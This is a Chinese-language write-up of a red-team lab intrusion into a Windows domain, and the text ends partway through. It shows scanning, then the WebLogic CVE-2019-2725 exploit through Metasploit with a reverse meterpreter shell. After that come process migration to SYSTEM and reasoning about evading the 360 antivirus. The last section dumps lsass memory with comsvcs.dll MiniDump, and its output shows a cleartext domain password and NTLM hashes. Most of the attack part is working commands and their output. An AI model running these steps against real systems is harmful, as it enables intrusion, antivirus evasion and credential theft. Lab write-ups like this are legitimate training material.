一、靶场信息

file-20260331113854636

相关注意事项:

file-20260331113911700

file-20260331113927968

二、信息搜集

1、TCP 端口扫描 + 指纹识别 + 操作系统识别

工具:rustscan + nmap

nmap 带上 -Pn 参数,表示不进行主机发现,这是为了避免主机发现失败导致的指纹探测失败。

因为 nmap 的默认扫描逻辑是这样的:

主机存活探测(ICMP ping / TCP ping)

没有响应?

认为主机已下线 → 直接跳过,不扫端口

问题在于,很多主机(尤其是 Windows、有防火墙的服务器)会屏蔽 ICMP,但端口服务完全正常运行。Nmap 误判主机离线,导致你什么都扫不到。

命令:

sudo rustscan -a 192.168.111.80 -r 1-65535 -- -sV -O -Pn -n

输出(由于输出很长,只是截取了关键的部分):

PORT      STATE SERVICE        REASON         VERSION
80/tcp open http syn-ack ttl 63 Microsoft IIS httpd 7.5
135/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 63 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp open ms-wbt-server? syn-ack ttl 63
7001/tcp open http syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC
49176/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC
49194/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC
60966/tcp open ms-sql-s syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (94%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 7 SP1 (94%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 SP1 (88%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 or Windows 8.1 (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.98%E=4%D=3/31%OT=80%CT=%CU=%PV=Y%G=N%TM=69CB43AF%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=109%TI=I%TS=7)
SEQ(SP=109%GCD=1%ISR=108%TI=I%TS=7)
OPS(O1=M551NW8ST11%O2=M551NW8ST11%O3=M551NW8NNT11%O4=M551NW8ST11%O5=M551NW8ST11%O6=M551ST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%TG=40%W=2000%O=M551NW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=N)

Uptime guess: 0.016 days (since Tue Mar 31 11:23:47 2026)
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 181.06 seconds
Raw packets sent: 198 (18.984KB) | Rcvd: 60 (3.064KB)

2、UDP 扫描关键端口 + 指纹识别

补一轮 UDP 扫描,以免漏掉关键信息:

工具:Nmap

命令:

sudo nmap -sU --top-ports 20 -sV -Pn -n 192.168.111.80

输出:

Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 11:51 +0800
Nmap scan report for 192.168.111.80
Host is up.

PORT STATE SERVICE VERSION
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.47 seconds

3、优先级列表

目标:大概率是一台 Windows Server 2008 R2

架构:几乎可以确认是 x64

file-20260331145150016

端口聚焦:

PORT      STATE SERVICE        REASON         VERSION
7001/tcp open http syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)

T3 协议是 WebLogic 的远程对象协议,默认开放,且历史上反复出现反序列化漏洞。

PORT      STATE SERVICE        REASON         VERSION
445/tcp open microsoft-ds syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

MS17-010 (EternalBlue) 这个漏洞在 2008 R2 上默认存在,直到打补丁为止。

三、漏洞查找与验证

1、CVE-2019-2725

根据指纹信息查找相关的漏洞:

file-20260331150953906

值得注意的是,关键词限制并不是却多越好,有些时候放宽点关键词,能看到更丰富的信息。

查看 CVE 编号:

zyf@kali:~$ searchsploit -x 46780 | head -10
Exploit: Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/46780
Path: /usr/share/exploitdb/exploits/windows/webapps/46780.py
Codes: CVE-2019-2725
Verified: False
File Type: Python script, ASCII text executable, with very long lines (6251)
#!/usr/bin/python

# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725

是 CVE-2019-2725,打开 MSF,通过 search 命令找对应的模块:

msfconsole
msf > search CVE-2019-2725

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/misc/weblogic_deserialize_asyncresponseservice 2019-04-23 excellent Yes Oracle Weblogic Server Deserialization RCE - AsyncResponseService
1 \_ target: Unix . . . .
2 \_ target: Windows . . . .
3 \_ target: Solaris . . . .


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
After interacting with a module you can manually set a TARGET with set TARGET 'Solaris'

使用模块并验证:

msf > use 0
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > info

Name: Oracle Weblogic Server Deserialization RCE - AsyncResponseService
Module: exploit/multi/misc/weblogic_deserialize_asyncresponseservice
Platform: Unix, Windows, Solaris
Arch: cmd, x64, x86
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2019-04-23

Provided by:
Andres Rodriguez - 2Secure (@acamro) <acamro@gmail.com>

Module side effects:
ioc-in-logs

Module stability:
crash-safe

Module reliability:
repeatable-session

Available targets:
Id Name
-- ----
=> 0 Unix
1 Windows
2 Solaris

Check supported:
Yes

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sap
ni, socks4
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 7001 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /_async/AsyncResponseService yes URL to AsyncResponseService
VHOST no HTTP server virtual host

Payload information:

Description:
An unauthenticated attacker with network access to the Oracle Weblogic Server T3
interface can send a malicious SOAP request to the interface WLS AsyncResponseService
to execute code on the vulnerable host.

References:
https://nvd.nist.gov/vuln/detail/CVE-2019-2725
http://web.archive.org/web/20190508024326/http://www.cnvd.org.cn/webinfo/show/4999
https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
https://twitter.com/F5Labs/status/1120822404568244224


View the full module info with the info -d command.

msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows
target => Windows
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST 192.168.111.44
LHOST => 192.168.111.44
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set RHOST 192.168.111.80
RHOST => 192.168.111.80
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
[+] 192.168.111.80:7001 - The target is vulnerable.

存在漏洞

2、永恒之蓝

用 Nmap 的 NSE 脚本验证是否存在漏洞:

┌──(zyf㉿kali)-[~/hongr2]
└─$ sudo nmap --script=smb-vuln-ms17-010 192.168.111.80 -p 445 -Pn -n
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 15:02 +0800
Nmap scan report for 192.168.111.80
Host is up (0.068s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 1.99 seconds

漏洞存在。

有两个入口,鉴于红人靶场(一)用过了永恒之蓝,这里就用 CVE-2019-2725。

四、漏洞利用

选择 payload 之后,直接 run

msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run
[-] Handler failed to bind to 192.168.111.44:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Generating payload...
[*] Sending payload...
[*] Sending stage (232006 bytes) to 192.168.111.80
[*] Meterpreter session 1 opened (10.8.0.6:4444 -> 192.168.111.80:49477) at 2026-03-31 15:18:14 +0800

meterpreter >

拿下 meterpreter shell。

五、跳板机信息收集

meterpreter > sysinfo
Computer : WEB
OS : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : DE1AY
Logged On Users : 5
Meterpreter : x64/windows

从 Domian 可以看出,目前出于一个域环境,且根据 Computer 可以看出本机的主机名是 WEB。

meterpreter > getuid
Server username: WEB\Administrator

不难发现,是本机的 Administrator 权限。

六、迁移进程与权限提升

获取当前 pid:

meterpreter > getpid
Current pid: 3676

查看进程列表:

ps
Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
208 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
256 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
340 332 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
392 332 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
400 384 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
436 384 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
496 392 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
504 392 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
508 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
512 392 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
600 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
664 496 vmacthlp.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
708 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
780 436 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\LogonUI.exe
788 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
836 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
880 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
924 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
968 496 ZhuDongFangYu.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\360\360Safe\deepscan\zhudongfangyu.exe
1144 496 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1192 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1304 836 taskeng.exe x64 0 WEB\Administrator C:\Windows\system32\taskeng.exe
1316 496 sqlwriter.exe x64 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
1360 1304 cmd.exe x64 0 WEB\Administrator C:\Windows\SYSTEM32\cmd.exe
1384 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe
1392 496 sqlservr.exe x64 0 DE1AY\mssql c:\Program Files\Microsoft SQL Server\MSSQL10_50.SQLEXPRESS\MSSQL\Binn\sq
lservr.exe
1500 692 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
1528 496 SMSvcHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
1548 496 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1700 496 ReportingServicesService.ex x64 0 DE1AY\mssql c:\Program Files\Microsoft SQL Server\MSRS10_50.SQLEXPRESS\Reporting Serv
e ices\ReportServer\bin\ReportingServicesService.exe
1896 496 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1908 1360 java.exe x86 0 WEB\Administrator C:\Oracle\MIDDLE~1\JDK160~1\bin\java.exe
1956 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1968 2528 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2168 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe
2232 3888 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2328 496 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\sppsvc.exe
2348 4004 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2432 496 fdlauncher.exe x64 0 NT AUTHORITY\LOCAL SERVICE c:\Program Files\Microsoft SQL Server\MSSQL10_50.SQLEXPRESS\MSSQL\Binn\fd
launcher.exe
2496 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2520 600 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe
2528 1908 cmd.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\cmd.exe
2560 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
2620 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe
2668 496 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe
2784 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe
2796 2432 fdhost.exe x64 0 NT AUTHORITY\LOCAL SERVICE c:\Program Files\Microsoft SQL Server\MSSQL10_50.SQLEXPRESS\MSSQL\Binn\fd
host.exe
2804 340 conhost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\conhost.exe
2820 496 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
2972 968 360Tray.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\360\360Safe\safemon\360Tray.exe
2996 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe
3088 3604 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
3112 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe
3280 1908 cmd.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\cmd.exe
3344 1968 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
3484 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe
3604 1908 cmd.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\cmd.exe
3676 2348 powershell.exe x64 0 WEB\Administrator C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
3724 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe
3868 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe
3888 3280 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
4004 1908 cmd.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\cmd.exe

目标选择:spoolsv.exe

首先要明确:什么是好的迁移目标?

需要满足三个条件:

条件 原因
SYSTEM 权限 不能降权,要保住 Administrator 及以上
x64 架构 必须和当前 Meterpreter 架构匹配
长期稳定运行 系统服务类进程,不会被用户操作关闭

现在看 ps 列表,符合三个条件的:

PID  1144  spoolsv.exe   x64  NT AUTHORITY\SYSTEM  ← 打印后台服务,常驻
PID 600 svchost.exe x64 NT AUTHORITY\SYSTEM ← 系统服务宿主
PID 1896 vmtoolsd.exe x64 NT AUTHORITY\SYSTEM ← VMware工具,靶场必然常驻

需要排除的是 svchost.exe,因为它同时跑着大量系统服务,migrate(Meterpreter 的进程迁移指令)进去如果操作不当可能导致系统不稳定。

vmtoolsd.exe 也不作为选项,因为它本质上是用于实现宿主机与虚拟机的交互,生命周期由宿主机控制,一旦靶场环境(虚拟机中)重启或者出现问题,这个进程可能就断了。

在观察进程的时候,可以注意到,本机子上运行着 360,而我们目前处于的进程(powershell.exe)刚好是 360 重点关注的对象,因此我们最好尽快 migrate 离开。

命令:

migrate 1144

输出:

[*] Migrating from 3676 to 1144...
[*] Migration completed successfully.

验证:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 1144

不仅实现了进程的迁移,还顺带提权成功。

七、横向移动

我看很多师傅的 WP,他们都将靶机中的 360、防火墙给关闭,但是我认为,这个是噪声很大的行为,通常真实环境中并不会采取这样的行动,即使是有,也只是微微修改。

1、域控制器

列出域 DE1AY 的所有域控制器(DC):

nltest /dclist:DE1AY

这里的:

  • nltest:Windows 自带的域/信任关系排查工具

  • /dclist:DE1AY:表示查询 DE1AY 这个域里的 DC 列表

输出:

C:\Windows\system32>nltest /dclist:DE1AY
nltest /dclist:DE1AY
Get list of DCs in domain 'DE1AY' from '\\DC'.
DC.de1ay.com [PDC] [DS] Site: Default-First-Site-Name
The command completed successfully

DC 的主机名是 DC。

这里为什么不使用 MSF 的后渗透模块呢?

因为 360 的存在,MSF 的后渗透模块的特征是比 Shell 原生命令要明显得多的。

查看所有网卡的信息:

ipconfig /all
Windows IP Configuration

Host Name . . . . . . . . . . . . : WEB
Primary Dns Suffix . . . . . . . : de1ay.com
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : de1ay.com

Ethernet adapter �������� 2:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
Physical Address. . . . . . . . . : 00-50-56-B1-3E-D4
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::44ac:f4d2:de86:5630%13(Preferred)
IPv4 Address. . . . . . . . . . . : 10.10.10.80(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.1
DHCPv6 IAID . . . . . . . . . . . : 301993001
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F
DNS Servers . . . . . . . . . . . : 10.10.10.10
NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter ��������:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-B1-48-8C
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::bc90:5eb2:f5fa:68c7%11(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.111.80(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.111.1
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F
DNS Servers . . . . . . . . . . . : 10.10.10.10
NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{AD80CD23-D97F-4814-A715-9248D845EA0F}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{D7E14072-49B9-45D3-BA8C-7955E6146CC2}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes

看得出本机是一个双网卡的主机:

  • 外网是 192.168.111.80
  • 内网是 10.10.10.80

并且还有一个关键信息,即域控的 IP 可能是 10.10.10.10

验证一下:

C:\Windows\system32> nslookup DC.de1ay.com
nslookup DC.de1ay.com
DNS request timed out.
timeout was 2 seconds.
������: UnKnown
Address: 10.10.10.10

����: DC.de1ay.com
Address: 10.10.10.10

确实是 10.10.10.10

2、凭证抓取

下面开始凭证抓取,注意此处还是不能使用 MSF 的后渗透模块,因为 360 的存在。

绕过的核心思路就是:把危险操作移到 AV 看不见的地方执行。

我们可以 dump lsass 内存,离线进行解析

原理:

Windows 把登录过的账户凭证缓存在 lsass.exe 进程内存里

把 lsass.exe 的内存整个 dump 成文件

把 dump 文件拉回 Kali

在 Kali 本地用 Mimikatz 离线解析,AV 管不到 Kali

用什么 dump lsass?

Windows 自带工具,不需要上传任何东西:

# 先找 lsass 的 pid
C:\> tasklist | findstr lsass

输出:

lsass.exe 504 Services 0 13,748 K

Dump:

C:\> rundll32.exe comsvcs.dll,MiniDump 504 C:\lsass.dmp full

验证文件是否生成:

C:\> dir C:\lsass.dmp

输出:

dir C:\lsass.dmp
������ C �еľ�û�б�ǩ��
��������� 36C6-96D5

C:\ ��Ŀ¼

2026/03/31 09:35 35,685,792 lsass.dmp
1 ���ļ� 35,685,792 �ֽ�
0 ��Ŀ¼ 23,998,697,472 �����ֽ�

把 lsass.dmp 拉回 Kali:

meterpreter > download C:\lsass.dmp /tmp/lsass.dmp

在 kali 本地分析:

pypykatz lsa minidump /tmp/lsass.dmp

输出:

INFO:pypykatz:Parsing file /tmp/lsass.dmp
FILE: ======== /tmp/lsass.dmp =======
== LogonSession ==
authentication_id 165100 (284ec)
session_id 0
username mssql
domainname DE1AY
logon_server DC
logon_time 2026-03-31T03:25:30.862066+00:00
sid S-1-5-21-2756371121-2868759905-3853650604-2103
luid 165100
== MSV ==
Username: mssql
Domain: DE1AY
LM: f67ce55ac831223dc187b8085fe1d9df
NT: 161cff084477fe596a5db81874498a24
SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d
DPAPI: NA
== WDIGEST [284ec]==
username mssql
domainname DE1AY
password 1qaz@WSX
password (hex)3100710061007a004000570053005800
== Kerberos ==
Username: mssql
Domain: DE1AY.COM
Password: 1qaz@WSX
password (hex)3100710061007a004000570053005800
AES128 Key: 161cff084477fe596a5db81874498a24
AES256 Key: 6dd445adefa385cc6484e2a8c8952be5da579a3664395d3d729c7e577a8b8009
== WDIGEST [284ec]==
username mssql
domainname DE1AY
password 1qaz@WSX
password (hex)3100710061007a004000570053005800
== TSPKG [284ec]==
username mssql
domainname DE1AY
password 1qaz@WSX
password (hex)3100710061007a004000570053005800
== DPAPI [284ec]==
luid 165100
key_guid 11f6ca2e-f884-4d1f-b1fa-bb20a5e6a5c4
masterkey 810b10e1648e60605a112c8c2e1b0a3d8c6a45787b77d5f23e97aed52bf9f55bdbaccdd813291a5ee658e2a8999c16e2b6b96eb51e40eb211de2a303a57c5ed8
sha1_masterkey dbff98983da5df4a349bf9e342f64b9b9d1b85da

== LogonSession ==
authentication_id 127932 (1f3bc)
session_id 0
username mssql
domainname DE1AY
logon_server DC
logon_time 2026-03-31T03:25:25.979257+00:00
sid S-1-5-21-2756371121-2868759905-3853650604-2103
luid 127932
== MSV ==
Username: mssql
Domain: DE1AY
LM: f67ce55ac831223dc187b8085fe1d9df
NT: 161cff084477fe596a5db81874498a24
SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d
DPAPI: NA
== WDIGEST [1f3bc]==
username mssql
domainname DE1AY
password 1qaz@WSX
password (hex)3100710061007a004000570053005800
== Kerberos ==
Username: mssql
Domain: DE1AY.COM
Password: 1qaz@WSX
password (hex)3100710061007a004000570053005800
AES128 Key: 161cff084477fe596a5db81874498a24
AES256 Key: 6dd445adefa385cc6484e2a8c8952be5da579a3664395d3d729c7e577a8b8009
== WDIGEST [1f3bc]==
username mssql
domainname DE1AY
password 1qaz@WSX
password (hex)3100710061007a004000570053005800
== TSPKG [1f3bc]==
username mssql
domainname DE1AY
password 1qaz@WSX
password (hex)3100710061007a004000570053005800
== DPAPI [1f3bc]==
luid 127932
key_guid 2448f6fe-7205-4d0f-bf26-ad62392fee41
masterkey 7f90a79da5e174918bcd0d1d9dd1817f14ec93452e30aa77f4baa8a44a8d6d96d9d4f5b03674ce769e9882310c4a3569782d088d725b5079e68c68656e58b01f
sha1_masterkey babc839ce0711c54628f2b8d1bc9eece4fcea7c2
== DPAPI [1f3bc]==
luid 127932
key_guid fd0e5033-a527-4336-9ce0-d8b80b5d114f
masterkey 4a42f16a6bb4094a579796a3dff1d1c5c05ae88ff9a56983c63fd8803dbc7759da9faf2f525cf6f6450eacf6ac37edf3bb64636976b8df9e4c374b530c01af95
sha1_masterkey d11dc11589f0e61c97e8cb5873489475a87d7915
== DPAPI [1f3bc]==
luid 127932
key_guid 11f6ca2e-f884-4d1f-b1fa-bb20a5e6a5c4
masterkey 810b10e1648e60605a112c8c2e1b0a3d8c6a45787b77d5f23e97aed52bf9f55bdbaccdd813291a5ee658e2a8999c16e2b6b96eb51e40eb211de2a303a57c5ed8
sha1_masterkey dbff98983da5df4a349bf9e342f64b9b9d1b85da

== LogonSession ==
authentication_id 996 (3e4)
session_id 0
username WEB$
domainname DE1AY
logon_server
logon_time 2026-03-31T03:25:21.907650+00:00
sid S-1-5-20
luid 996
== MSV ==
Username: WEB$
Domain: DE1AY
LM: NA
NT: c2ad29b45ce46e659d7eac123b4f383c
SHA1: 62fc725c3e7e366b9517431e3473badeb0fb7819
DPAPI: NA
== WDIGEST [3e4]==
username WEB$
domainname DE1AY
password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
== Kerberos ==
Username: web$
Domain: DE1AY.COM
